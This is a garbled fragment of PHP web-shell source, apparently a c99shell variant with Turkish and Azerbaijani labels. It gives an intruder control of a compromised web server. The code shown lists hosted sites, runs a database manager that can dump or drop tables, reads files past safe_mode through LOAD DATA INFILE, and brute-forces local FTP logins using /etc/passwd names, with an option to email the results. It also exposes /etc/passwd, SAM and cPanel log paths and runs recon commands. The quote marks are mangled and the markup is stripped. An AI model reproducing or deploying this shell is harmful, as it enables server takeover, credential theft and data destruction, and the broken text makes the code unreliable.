Grup                 : “,1);} else {echo get_current_user();} ?>cURL                      : “.(($curl_on)?(“İşləyir“):(“İşləmir“)); ?>
İşləyir
“;}else{$reg_g=”İşləmir“;} echo(“Global Kayit          : $reg_g”); ?>MySQL                   : “;
$mysql_on = @function_exists(‘mysql_connect’);
if($mysql_on){
echo “İşləyir“; } else { echo “İşləmir“; }
echo “
“;
echo ”
MSSQL                   : “;
$mssql_on = @function_exists(‘mssql_connect’);
if($mssql_on){echo “İşləyir“;}else{echo “İşləmir“;} ?>PostgreSQL           : “;
$pg_on = @function_exists(‘pg_connect’);
if($pg_on){echo “İşləyir“;}else{echo “İşləmir“;} ?>Oracle                    : “;
$ora_on = @function_exists(‘ocilogon’);
if($ora_on){echo “İşləyir“;}else{echo “İşləmir“;} ?>
 

Qorunma                : 

 


Serverdeki Saytlarin Siyahisi

“.htmlspecialchars($b).DIRECTORY_SEPARATOR.”“;
$i++;
}
echo ”   “;
if (is_writable($d))
{
$wd = TRUE;
$wdt = “[ Ok! ]“;
echo ““.view_perms(fileperms($d)).”“;
}
else
{
$wd = FALSE;
$wdt = “[ Sadece Okunabilir! ]“;
echo ““.view_perms_color($d).”“;
}
if (is_callable(“disk_free_space”))
{
$free = disk_free_space($d);
$total = disk_total_space($d);
if ($free === FALSE) {$free = 0;}
if ($total === FALSE) {$total = 0;}
if ($free < 0) {$free = 0;}
if ($total < 0) {$total = 0;}
$used = $total-$free;
$free_percent = round(100/($total/$free),2);

}
$letters = “”;
if ($win)
{
$v = explode(“\\”,$d);
$v = $v[0];
foreach (range(“a”,”z”) as $letter)
{
$bool = $isdiskette = in_array($letter,$safemode_diskettes);
if (!$bool) {$bool = is_dir($letter.”:\\”);}
if ($bool)
{
$letters .= “[ “;
if ($letter.”:” != $v) {$letters .= $letter;}
else {$letters .= ““.$letter.”“;}
$letters .= ” ]
“;
}
}
if (!empty($letters)) {}
}
if (count($quicklaunch) > 0)
{
foreach($quicklaunch as $item)
{
$item[1] = str_replace(“%d”,urlencode($d),$item[1]);
$item[1] = str_replace(“%sort”,$sort,$item[1]);
$v = realpath($d.”..”);
if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
$item[1] = str_replace(“%upd”,urlencode($v),$item[1]);
echo ““.$item[0].”    “;
}
}
echo “

“;
if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo ”

“.$donated_html.”

“;}
echo “”;
$line = explode(” “,$line);
$line[10] = join(” “,array_slice($line,10));
$line = array_slice($line,0,11);
if ($line[0] == get_current_user()) {$line[0] = ““.$line[0].”“;}
$line[] = “KILL“;
$prcs[] = $line;
echo “”;
}
}
}
else
{
while (ereg(” “,$ret)) {$ret = str_replace(” “,””,$ret);}
while (ereg(” “,$ret)) {$ret = str_replace(” “,””,$ret);}
while (ereg(” “,$ret)) {$ret = str_replace(” “,””,$ret);}
while (ereg(” “,$ret)) {$ret = str_replace(” “,””,$ret);}
while (ereg(” “,$ret)) {$ret = str_replace(” “,””,$ret);}
while (ereg(” “,$ret)) {$ret = str_replace(” “,””,$ret);}
while (ereg(” “,$ret)) {$ret = str_replace(” “,””,$ret);}
while (ereg(” “,$ret)) {$ret = str_replace(” “,””,$ret);}
while (ereg(” “,$ret)) {$ret = str_replace(” “,””,$ret);}
while (ereg(“”,$ret)) {$ret = str_replace(“”,””,$ret);}
while (ereg(” “,$ret)) {$ret = str_replace(” “,””,$ret);}
$ret = convert_cyr_string($ret,”d”,”w”);
$stack = explode(“\n”,$ret);
unset($stack[0],$stack[2]);
$stack = array_values($stack);
$head = explode(“”,$stack[0]);
$head[1] = explode(” “,$head[1]);
$head[1] = $head[1][0];
$stack = array_slice($stack,1);
unset($head[2]);
$head = array_values($head);
if ($parsesort[1] != “a”) {$y = “[sort_desc]“;}
else {$y = “[sort_asc]“;}
if ($k > count($head)) {$k = count($head)-1;}
for($i=0;$i“.trim($head[$i]).”“;}
}
$prcs = array();
foreach ($stack as $line)
{
if (!empty($line))
{
echo “
“;
$line = explode(“”,$line);
$line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
$line[2] = intval(str_replace(” “,””,$line[2]))*1024;
$prcs[] = $line;
echo “”;
}
}
}
$head[$k] = ““.$head[$k].”“.$y;
$v = $processes_sort[0];
usort($prcs,”tabsort”);
if ($processes_sort[1] == “d”) {$prcs = array_reverse($prcs);}
$tab = array();
$tab[] = $head;
$tab = array_merge($tab,$prcs);
echo ”

“;
if ($act == “”) {$act = $dspact = “ls”;}
if ($act == “sql”)
{
$sql_surl = $surl.”act=sql”;
if ($sql_login) {$sql_surl .= “&sql_login=”.htmlspecialchars($sql_login);}
if ($sql_passwd) {$sql_surl .= “&sql_passwd=”.htmlspecialchars($sql_passwd);}
if ($sql_server) {$sql_surl .= “&sql_server=”.htmlspecialchars($sql_server);}
if ($sql_port) {$sql_surl .= “&sql_port=”.htmlspecialchars($sql_port);}
if ($sql_db) {$sql_surl .= “&sql_db=”.htmlspecialchars($sql_db);}
$sql_surl .= “&”;
?>”;
if (!$sql_sock) {?>”;
}
echo ”


SQL Baglanti Sihirbazi:
“;
if (!$sql_sock)
{
if (!$sql_server) {echo “Su anda baglanti y0k!”;}
else {echo “
Baglanti yapilamiy0r!
“; echo ““.$err.”“;}
}
else
{
$sqlquicklaunch = array();
$sqlquicklaunch[] = array(“Index”,$surl.”act=sql&sql_login=”.htmlspecialchars($sql_login).”&sql_passwd=”.htmlspecialchars($sql_passwd).”&sql_server=”.htmlspecialchars($sql_server).”&sql_port=”.htmlspecialchars($sql_port).”&”);
$sqlquicklaunch[] = array(“Query”,$sql_surl.”sql_act=query&sql_tbl=”.urlencode($sql_tbl));
$sqlquicklaunch[] = array(“Server-status”,$surl.”act=sql&sql_login=”.htmlspecialchars($sql_login).”&sql_passwd=”.htmlspecialchars($sql_passwd).”&sql_server=”.htmlspecialchars($sql_server).”&sql_port=”.htmlspecialchars($sql_port).”&sql_act=serverstatus”);
$sqlquicklaunch[] = array(“Server variables”,$surl.”act=sql&sql_login=”.htmlspecialchars($sql_login).”&sql_passwd=”.htmlspecialchars($sql_passwd).”&sql_server=”.htmlspecialchars($sql_server).”&sql_port=”.htmlspecialchars($sql_port).”&sql_act=servervars”);
$sqlquicklaunch[] = array(“Processes”,$surl.”act=sql&sql_login=”.htmlspecialchars($sql_login).”&sql_passwd=”.htmlspecialchars($sql_passwd).”&sql_server=”.htmlspecialchars($sql_server).”&sql_port=”.htmlspecialchars($sql_port).”&sql_act=processes”);
$sqlquicklaunch[] = array(“Logout”,$surl.”act=sql”);
echo “
MySQL “.mysql_get_server_info().” (proto v.”.mysql_get_proto_info ().”) running in “.htmlspecialchars($sql_server).”:”.htmlspecialchars($sql_port).” as “.htmlspecialchars($sql_login).”@”.htmlspecialchars($sql_server).” (password – \””.htmlspecialchars($sql_passwd).”\”)
“;
if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo “[ “.$item[0].” ] “;}}
echo “
“;
}
echo “


  • Database istifadəçi adı və şifrəsini yazın
  • Databasa şifrəsini və adını yazın
  • Port Nömrəsi ilə oynamayın
  •  

    Db istifadəçi Adı DB Sifrəsi  Database Adi 
    Server adl Port No
    “>
    Home


    “.htmlspecialchars($sql_db).” ]—
    “;
    $c = 0;
    while ($row = mysql_fetch_array($result)) {$count = mysql_query (“SELECT COUNT(*) FROM “.$row[0]); $count_row = mysql_fetch_array($count); echo “» “.htmlspecialchars($row[0]).” (“.$count_row[0].”)
    “; mysql_free_result($count); $c++;}
    if (!$c) {echo “No tables found in database.”;}
    }
    }
    else
    {
    ?>

    Home


    “.$row[0].””; $c++;}
    echo ”“;
    echo $dbs;
    }
    ?>


    Please, select database


    “;
    //Start center panel
    $diplay = TRUE;
    if ($sql_db)
    {
    if (!is_numeric($c)) {$c = 0;}
    if ($c == 0) {$c = “no”;}
    echo ”


    There are “.$c.” table(s) in this DB (“.htmlspecialchars($sql_db).”).
    “;
    if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo “[ “.$item[0].” ] “;}}
    echo “
    “;
    $acts = array(“”,”dump”);
    if ($sql_act == “tbldrop”) {$sql_query = “DROP TABLE”; foreach($boxtbl as $v) {$sql_query .= “\n`”.$v.”` ,”;} $sql_query = substr($sql_query,0,-1).”;”; $sql_act = “query”;}
    elseif ($sql_act == “tblempty”) {$sql_query = “”; foreach($boxtbl as $v) {$sql_query .= “DELETE FROM `”.$v.”` \n”;} $sql_act = “query”;}
    elseif ($sql_act == “tbldump”) {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = “dump”;}
    elseif ($sql_act == “tblcheck”) {$sql_query = “CHECK TABLE”; foreach($boxtbl as $v) {$sql_query .= “\n`”.$v.”` ,”;} $sql_query = substr($sql_query,0,-1).”;”; $sql_act = “query”;}
    elseif ($sql_act == “tbloptimize”) {$sql_query = “OPTIMIZE TABLE”; foreach($boxtbl as $v) {$sql_query .= “\n`”.$v.”` ,”;} $sql_query = substr($sql_query,0,-1).”;”; $sql_act = “query”;}
    elseif ($sql_act == “tblrepair”) {$sql_query = “REPAIR TABLE”; foreach($boxtbl as $v) {$sql_query .= “\n`”.$v.”` ,”;} $sql_query = substr($sql_query,0,-1).”;”; $sql_act = “query”;}
    elseif ($sql_act == “tblanalyze”) {$sql_query = “ANALYZE TABLE”; foreach($boxtbl as $v) {$sql_query .= “\n`”.$v.”` ,”;} $sql_query = substr($sql_query,0,-1).”;”; $sql_act = “query”;}
    elseif ($sql_act == “deleterow”) {$sql_query = “”; if (!empty($boxrow_all)) {$sql_query = “DELETE * FROM `”.$sql_tbl.”`;”;} else {foreach($boxrow as $v) {$sql_query .= “DELETE * FROM `”.$sql_tbl.”` WHERE”.$v.” LIMIT 1;\n”;} $sql_query = substr($sql_query,0,-1);} $sql_act = “query”;}
    elseif ($sql_tbl_act == “insert”)
    {
    if ($sql_tbl_insert_radio == 1)
    {
    $keys = “”;
    $akeys = array_keys($sql_tbl_insert);
    foreach ($akeys as $v) {$keys .= “`”.addslashes($v).”`, “;}
    if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
    $values = “”;
    $i = 0;
    foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct.” (“;} $values .= “‘”.addslashes($v).”‘”; if ($funct) {$values .= “)”;} $values .= “, “; $i++;}
    if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
    $sql_query = “INSERT INTO `”.$sql_tbl.”` ( “.$keys.” ) VALUES ( “.$values.” );”;
    $sql_act = “query”;
    $sql_tbl_act = “browse”;
    }
    elseif ($sql_tbl_insert_radio == 2)
    {
    $set = mysql_buildwhere($sql_tbl_insert,”, “,$sql_tbl_insert_functs);
    $sql_query = “UPDATE `”.$sql_tbl.”` SET “.$set.” WHERE “.$sql_tbl_insert_q.” LIMIT 1;”;
    $result = mysql_query($sql_query) or print(mysql_smarterror());
    $result = mysql_fetch_array($result, MYSQL_ASSOC);
    $sql_act = “query”;
    $sql_tbl_act = “browse”;
    }
    }
    if ($sql_act == “query”)
    {
    echo ”


    “;
    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = “Query was empty”;} echo “Error:
    “.$sql_query_error.”
    “;}
    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
    if ((!$submit) or ($sql_act)) {echo ”

    “; if (($sql_query) and (!$submit)) {echo “Do you really want to:”;} else {echo “SQL-Query :”;} echo “

     

    “;}
    }
    if (in_array($sql_act,$acts))
    {
    ?>

    Create a new table:

     
    Dump DataBase:

    “> 

    “;}
    if ($sql_act == “newtbl”)
    {
    echo ““;
    if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo “DB \””.htmlspecialchars($sql_newdb).”\” has been created with success!

    “;
    }
    else {echo “Can’t create DB \””.htmlspecialchars($sql_newdb).”\”.
    Reason: “.mysql_smarterror();}
    }
    elseif ($sql_act == “dump”)
    {
    if (empty($submit))
    {
    $diplay = FALSE;
    echo “

    SQL-Dump:

    “;
    echo “DB: 

    “;
    $v = join (“;”,$dmptbls);
    echo “Only tables (explode \”;\”) 1: 

    “;
    if ($dump_file) {$tmp = $dump_file;}
    else {$tmp = htmlspecialchars(“./dump_”.getenv(“SERVER_NAME”).”_”.$sql_db.”_”.date(“d-m-Y-H-i-s”).”.sql”);}
    echo “File: 

    “;
    echo “Download:  

    “;
    echo “Save to file:  “;
    echo ”

    1 – all, if empty”;
    echo “

    “;
    }
    else
    {
    $diplay = TRUE;
    $set = array();
    $set[“sock”] = $sql_sock;
    $set[“db”] = $sql_db;
    $dump_out = “download”;
    $set[“print”] = 0;
    $set[“nl2br”] = 0;
    $set[“”] = 0;
    $set[“file”] = $dump_file;
    $set[“add_drop”] = TRUE;
    $set[“onlytabs”] = array();
    if (!empty($dmptbls)) {$set[“onlytabs”] = explode(“;”,$dmptbls);}
    $ret = mysql_dump($set);
    if ($sql_dump_download)
    {
    @ob_clean();
    header(“Content-type: application/octet-stream”);
    header(“Content-length: “.strlen($ret));
    header(“Content-disposition: attachment; filename=\””.basename($sql_dump_file).”\”;”);
    echo $ret;
    exit;
    }
    elseif ($sql_dump_savetofile)
    {
    $fp = fopen($sql_dump_file,”w”);
    if (!$fp) {echo “Indirme Hatas?! Bu dosya yazilabilir degil \””.htmlspecialchars($sql_dump_file).”\”!”;}
    else
    {
    fwrite($fp,$ret);
    fclose($fp);
    echo “Indirildi! Yazilma basariyla tamamlandi \””.htmlspecialchars(realpath($sql_dump_file)).”\” (“.view_size(filesize($sql_dump_file)).”).”;
    }
    }
    else {echo “Indirme: Indirilecek?“;}
    }
    }
    if ($diplay)
    {
    if (!empty($sql_tbl))
    {
    if (empty($sql_tbl_act)) {$sql_tbl_act = “browse”;}
    $count = mysql_query(“SELECT COUNT(*) FROM `”.$sql_tbl.”`;”);
    $count_row = mysql_fetch_array($count);
    mysql_free_result($count);
    $tbl_struct_result = mysql_query(“SHOW FIELDS FROM `”.$sql_tbl.”`;”);
    $tbl_struct_fields = array();
    while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
    if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
    if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
    if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
    if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
    $perpage = $sql_tbl_le – $sql_tbl_ls;
    if (!is_numeric($perpage)) {$perpage = 10;}
    $numpages = $count_row[0]/$perpage;
    $e = explode(” “,$sql_order);
    if (count($e) == 2)
    {
    if ($e[0] == “d”) {$asc_desc = “DESC”;}
    else {$asc_desc = “ASC”;}
    $v = “ORDER BY `”.$e[1].”` “.$asc_desc.” “;
    }
    else {$v = “”;}
    $query = “SELECT * FROM `”.$sql_tbl.”` “.$v.”LIMIT “.$sql_tbl_ls.” , “.$perpage.””;
    $result = mysql_query($query) or print(mysql_smarterror());
    echo ”


    Table “.htmlspecialchars($sql_tbl).” (“.mysql_num_fields($result).” cols and “.$count_row[0].” rows)
    “;
    echo “Structure ]   “;
    echo “Browse ]   “;
    echo “Dump ]   “;
    echo “Insert ]   “;
    if ($sql_tbl_act == “structure”) {echo ”

    Coming sooon!“;}
    if ($sql_tbl_act == “insert”)
    {
    if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
    if (!empty($sql_tbl_insert_radio))
    {

    }
    else
    {
    echo ”

    Inserting row into table:
    “;
    if (!empty($sql_tbl_insert_q))
    {
    $sql_query = “SELECT * FROM `”.$sql_tbl.”`”;
    $sql_query .= ” WHERE”.$sql_tbl_insert_q;
    $sql_query .= ” LIMIT 1;”;
    $result = mysql_query($sql_query,$sql_sock) or print(”

    “.mysql_smarterror());
    $values = mysql_fetch_assoc($result);
    mysql_free_result($result);
    }
    else {$values = array();}
    echo “

    “;
    foreach ($tbl_struct_fields as $field)
    {
    $name = $field[“Field”];
    if (empty($sql_tbl_insert_q)) {$v = “”;}
    echo “”;
    $i++;
    }
    echo ”

    Field Type Function Value
    “.htmlspecialchars($name).” “.$field[“Type”].”

    “;
    echo “Insert as new row“;
    if (!empty($sql_tbl_insert_q)) {echo ” or Save“; echo ““;}
    echo ”

    “;
    }
    }
    if ($sql_tbl_act == “browse”)
    {
    $sql_tbl_ls = abs($sql_tbl_ls);
    $sql_tbl_le = abs($sql_tbl_le);
    echo ”


    “;
    echo “[Pages] “;
    $b = 0;
    for($i=0;$i<$numpages;$i++)
    {
    if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo ““;}
    echo $i;
    if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo “
    “;}
    if (($i/30 == round($i/30)) and ($i > 0)) {echo ”
    “;}
    else {echo ” “;}
    }
    if ($i == 0) {echo “empty”;}
    echo “

    From:  To:  

    “;
    echo ”

    “;
    echo “”;
    echo “”;
    for ($i=0;$i“;
    if (empty($e[0])) {$e[0] = “a”;}
    if ($e[1] != $v) {echo ““.$v.”“;}
    else {echo ““.$v.”[sort]“;}
    echo “”;
    }
    echo “
    “;
    echo “”;
    while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
    {
    echo “”;
    $w = “”;
    $i = 0;
    foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= ” `”.$name.”` = ‘”.addslashes($v).”‘ AND”; $i++;}
    if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
    echo “”;
    $i = 0;
    foreach ($row as $k=>$v)
    {
    $v = htmlspecialchars($v);
    if ($v == “”) {$v = “NULL“;}
    echo “”;
    $i++;
    }
    echo “”;
    echo “”;
    }
    mysql_free_result($result);
    echo ”

    Action
    “.$v.” “;
    echo “[Delete] “;
    echo “[Edit] “;
    echo “

     

    “;
    }
    }
    else
    {
    $result = mysql_query(“SHOW TABLE STATUS”, $sql_sock);
    if (!$result) {echo mysql_smarterror();}
    else
    {
    echo ”

    “;
    $i = 0;
    $tsize = $trows = 0;
    while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
    {
    $tsize += $row[“Data_length”];
    $trows += $row[“Rows”];
    $size = view_size($row[“Data_length”]);
    echo “”;
    echo “”;
    echo “”;
    echo “”;
    echo “”;
    echo “”;
    echo “”;
    echo “”;
    echo “”;
    echo “”;
    $i++;
    }
    echo “”;
    echo “”;
    echo “”;
    echo “”;
    echo “”;
    echo “”;
    echo “”;
    echo “”;
    echo “”;
    echo “”;
    echo ”

    Table
    Rows Type Created Modified Size Action
     “.$row[“Name”].”  “.$row[“Rows”].” “.$row[“Type”].” “.$row[“Create_time”].” “.$row[“Update_time”].” “.$size.”  [Empty]  [Drop] [Insert] 
    »
    “.$i.” table(s)
    “.$trows.” “.$row[1].” “.$row[10].” “.$row[11].” “.view_size($tsize).”

     

    “;
    mysql_free_result($result);
    }
    }
    }
    }
    }
    else
    {
    $acts = array(“”,”newdb”,”serverstatus”,”servervars”,”processes”,”getfile”);
    if (in_array($sql_act,$acts)) {?>

    Create new DataBase:

     
    View File:

     


    “;
    if ($sql_act == “newdb”)
    {
    echo ““;
    if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo “DB \””.htmlspecialchars($sql_newdb).”\” has been created with success!

    “;}
    else {echo “Can’t create DB \””.htmlspecialchars($sql_newdb).”\”.
    Reason:
    “.mysql_smarterror();}
    }
    if ($sql_act == “serverstatus”)
    {
    $result = mysql_query(“SHOW STATUS”, $sql_sock);
    echo “

    Server-status variables:

    “;
    echo “”;
    while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo “”;}
    echo ”

    Name Value
    “.$row[0].” “.$row[1].”

    “;
    mysql_free_result($result);
    }
    if ($sql_act == “servervars”)
    {
    $result = mysql_query(“SHOW VARIABLES”, $sql_sock);
    echo “
    Server variables:

    “;
    echo “”;
    while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo “”;}
    echo ”

    Name Value
    “.$row[0].” “.$row[1].”

    “;
    mysql_free_result($result);
    }
    if ($sql_act == “processes”)
    {
    if (!empty($kill)) {$query = “KILL “.$kill.”;”; $result = mysql_query($query, $sql_sock); echo “Killing process #”.$kill.”… ok. he is dead, amen.“;}
    $result = mysql_query(“SHOW PROCESSLIST”, $sql_sock);
    echo “

    Processes:

    “;
    echo “”;
    while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo “”;}
    echo ”

    ID USER HOST DB COMMAND TIME STATE INFO Action
    “.$row[0].” “.$row[1].” “.$row[2].” “.$row[3].” “.$row[4].” “.$row[5].” “.$row[6].” “.$row[7].” Kill

    “;
    mysql_free_result($result);
    }
    if ($sql_act == “getfile”)
    {
    $tmpdb = $sql_login.”_tmpdb”;
    $select = mysql_select_db($tmpdb);
    if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
    if ($select)
    {
    $created = FALSE;
    mysql_query(“CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );”);
    mysql_query(“LOAD DATA INFILE \””.addslashes($sql_getfile).”\” INTO TABLE tmp_file”);
    $result = mysql_query(“SELECT * FROM tmp_file;”);
    if (!$result) {echo “Error in reading file (permision denied)!“;}
    else
    {
    for ($i=0;$iFile \””.$sql_getfile.”\” does not exists or empty!
    “;}
    else {echo “File \””.$sql_getfile.”\”:
    “.nl2br(htmlspecialchars($f)).”
    “;}
    mysql_free_result($result);
    mysql_query(“DROP TABLE tmp_file;”);
    }
    }
    mysql_drop_db($tmpdb);
    }
    }
    }
    }
    echo “

    “;
    if ($sql_sock)
    {
    $affected = @mysql_affected_rows($sql_sock);
    if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
    echo “

    Affected rows: “.$affected.”

    “;
    }
    if ($act == “mkdir”)
    {
    if ($mkdir != $d)
    {
    if (file_exists($mkdir)) {echo “Make Dir \””.htmlspecialchars($mkdir).”\”: object alredy exists”;}
    elseif (!mkdir($mkdir)) {echo “Make Dir \””.htmlspecialchars($mkdir).”\”: access denied”;}
    echo ”

    “;
    }
    $act = $dspact = “ls”;
    }
    if ($act == “ftpquickbrute”)
    {
    echo “FTP Kirici:
    “;
    if (!win) {echo “Bu ozellik Wind0ws serverlarda calismaz!

    “;}
    else
    {
    function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
    {
    if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array(“/bin/FALSE”,”/sbin/nologin”)));}
    else {$TRUE = TRUE;}
    if ($TRUE)
    {
    $sock = @ftp_connect($host,$port,$timeout);
    if (@ftp_login($sock,$login,$pass))
    {
    echo “Connected to “.$host.” with login \””.$login.”\” and password \””.$pass.”\”.
    “;
    ob_flush();
    return TRUE;
    }
    }
    }
    if (!empty($submit))
    {
    if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
    $fp = fopen(“/etc/passwd”,”r”);
    if (!$fp) {echo “Can’t get /etc/passwd for password-list.”;}
    else
    {
    if ($fqb_logging)
    {
    if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,”w”);}
    else {$fqb_logfp = FALSE;}
    $fqb_log = “FTP Quick Brute (called c99shell v. “.$shver.”) started at “.date(“d.m.Y H:i:s”).”\r\n\r\n”;
    if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
    }
    ob_flush();
    $i = $success = 0;
    $ftpquick_st = getmicrotime();
    while(!feof($fp))
    {
    $str = explode(“:”,fgets($fp,2048));
    if (c99ftpbrutecheck(“localhost”,21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
    {
    echo “Connected to “.getenv(“SERVER_NAME”).” with login \””.$str[0].”\” and password \””.$str[0].”\”
    “;
    $fqb_log .= “Connected to “.getenv(“SERVER_NAME”).” with login \””.$str[0].”\” and password \””.$str[0].”\”, at “.date(“d.m.Y H:i:s”).”\r\n”;
    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
    $success++;
    ob_flush();
    }
    if ($i > $fqb_lenght) {break;}
    $i++;
    }
    if ($success == 0) {echo “No success. connections!”; $fqb_log .= “No success. connections!\r\n”;}
    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
    echo ”


    Done!
    Total time (secs.): “.$ftpquick_t.”
    Total connections: “.$i.”
    Success.: “.$success.”
    Unsuccess.:”.($i-$success).”
    Connects per second: “.round($i/$ftpquick_t,2).”
    “;
    $fqb_log .= “\r\n——————————————\r\nDone!\r\nTotal time (secs.): “.$ftpquick_t.”\r\nTotal connections: “.$i.”\r\nSuccess.: “.$success.”\r\nUnsuccess.:”.($i-$success).”\r\nConnects per second: “.round($i/$ftpquick_t,2).”\r\n”;
    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
    if ($fqb_logemail) {@mail($fqb_logemail,”c99shell v. “.$shver.” report”,$fqb_log);}
    fclose($fqb_logfp);
    }
    }
    else
    {
    $logfile = $tmpdir_logs.”ftpquickbrute_”.date(“d.m.Y_H_i_s”).”.log”;
    $logfile = str_replace(“//”,DIRECTORY_SEPARATOR,$logfile);
    echo “


    Read first:

    Users only with shell? 

    Logging? 

    Logging to file? 
    Logging to e-mail? 

    “;
    }
    }
    }
    if ($act == “d”)
    {
    if (!is_dir($d)) {echo “

    Permision denied!
    “;}
    else
    {
    echo “Directory information:“;
    if (!$win)
    {
    echo ”

    Owner/Group “;
    $ow = posix_getpwuid(fileowner($d));
    $gr = posix_getgrgid(filegroup($d));
    $row[] = ($ow[“name”]?$ow[“name”]:fileowner($d)).”/”.($gr[“name”]?$gr[“name”]:filegroup($d));
    }
    echo “
    Perms “.view_perms_color($d).”
    Create time “.date(“d/m/Y H:i:s”,filectime($d)).”
    Access time “.date(“d/m/Y H:i:s”,fileatime($d)).”
    MODIFY time “.date(“d/m/Y H:i:s”,filemtime($d)).”

    “;
    }
    }
    if ($act == “phpinfo”) {@ob_clean(); phpinfo(); c99shexit();}
    if ($act == “security”)
    {
    echo “

    Server Information:
    Open base dir: “.$hopenbasedir.”
    “;
    if (!$win)
    {
    if ($nixpasswd)
    {
    if ($nixpasswd == 1) {$nixpasswd = 0;}
    echo “*nix /etc/passwd:
    “;
    if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
    if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
    echo “

    From:  To:  

    “;
    $i = $nixpwd_s;
    while ($i < $nixpwd_e)
    {
    $uid = posix_getpwuid($i);
    if ($uid)
    {
    $uid[“dir”] = ““.$uid[“dir”].”“;
    echo join(“:”,$uid).”
    “;
    }
    $i++;
    }
    }
    else {echo ”
    Get /etc/passwd
    “;}
    }
    else
    {
    $v = $_SERVER[“WINDIR”].”\repair\sam”;
    if (file_get_contents($v)) {echo “You can’t crack winnt passwords(“.$v.”)
    “;}
    else {echo ”
    You can crack winnt passwords. Download, and use lcp.crack+ ©.
    “;}
    }
    if (file_get_contents(“/etc/userdomains”)) {echo “View cpanel user-domains logs
    “;}
    if (file_get_contents(“/var/cpanel/accounting.log”)) {echo “View cpanel logs
    “;}
    if (file_get_contents(“/usr/local/apache/conf/httpd.conf”)) {echo “Apache configuration (httpd.conf)
    “;}
    if (file_get_contents(“/etc/httpd.conf”)) {echo “Apache configuration (httpd.conf)
    “;}
    if (file_get_contents(“/etc/syslog.conf”)) {echo “Syslog configuration (syslog.conf)
    “;}
    if (file_get_contents(“/etc/motd”)) {echo “Message Of The Day
    “;}
    if (file_get_contents(“/etc/hosts”)) {echo “Hosts
    “;}
    function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = ““.$name.” – “;} echo $name.nl2br($value).”
    “;}}
    displaysecinfo(“OS Version?”,myshellexec(“cat /proc/version”));
    displaysecinfo(“Kernel version?”,myshellexec(“sysctl -a | grep version”));
    displaysecinfo(“Distrib name”,myshellexec(“cat /etc/issue.net”));
    displaysecinfo(“Distrib name (2)”,myshellexec(“cat /etc/*-realise”));
    displaysecinfo(“CPU?”,myshellexec(“cat /proc/cpuinfo”));
    displaysecinfo(“RAM”,myshellexec(“free -m”));
    displaysecinfo(“HDD space”,myshellexec(“df -h”));
    displaysecinfo(“List of Attributes”,myshellexec(“lsattr -a”));
    displaysecinfo(“Mount options “,myshellexec(“cat /etc/fstab”));
    displaysecinfo(“Is cURL installed?”,myshellexec(“which curl”));
    displaysecinfo(“Is lynx installed?”,myshellexec(“which lynx”));
    displaysecinfo(“Is links installed?”,myshellexec(“which links”));
    displaysecinfo(“Is fetch installed?”,myshellexec(“which fetch”));
    displaysecinfo(“Is GET installed?”,myshellexec(“which GET”));
    displaysecinfo(“Is perl installed?”,myshellexec(“which perl”));
    displaysecinfo(“Where is apache”,myshellexec(“whereis apache”));
    displaysecinfo(“Where is perl?”,myshellexec(“whereis perl”));
    displaysecinfo(“locate proftpd.conf”,myshellexec(“locate proftpd.conf”));
    displaysecinfo(“locate httpd.conf”,myshellexec(“locate httpd.conf”));
    displaysecinfo(“locate my.conf”,myshellexec(“locate my.conf”));
    displaysecinfo(“locate psybnc.conf”,myshellexec(“locate psybnc.conf”));
    }
    if ($act == “mkfile”)
    {
    if ($mkfile != $d)
    {
    if (file_exists($mkfile)) {echo “Make File \””.htmlspecialchars($mkfile).”\”: object alredy exists”;}
